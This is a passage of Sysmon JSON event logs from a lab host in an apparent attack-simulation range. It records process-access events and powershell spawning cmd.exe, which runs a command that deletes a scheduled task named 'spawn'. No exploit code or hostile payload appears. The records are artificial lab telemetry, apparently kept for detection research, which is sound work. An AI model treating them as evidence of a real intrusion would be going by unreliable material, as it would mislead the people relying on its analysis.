C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001003CF0800}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001003CF0800}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001003CF0800}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001003CF0800}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.522\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-0010CDCF0800}\r\nProcessId: 4840\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: SCHTASKS  /Delete /TN spawn /F  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11DA-5F25-0000-001003CF0800}\r\nParentProcessId: 4880\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /TN spawn /F >nul 2>&1\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.522","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-0010CDCF0800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"SCHTASKS  /Delete /TN spawn /F  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11DA-5F25-0000-001003CF0800}","ParentProcessId":"4880","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /TN spawn /F &gt;nul 2&gt;&amp;1\" ","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-11DA-5F25-0000-001003CF0800}\r\nSourceProcessId: 4880\r\nSourceThreadId: 4216\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-00106B8A0600}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001003CF0800}","SourceProcessId":"4880","SourceThreadId":"4216","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-00106B8A0600}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-00106B8A0600}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-00106B8A0600}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 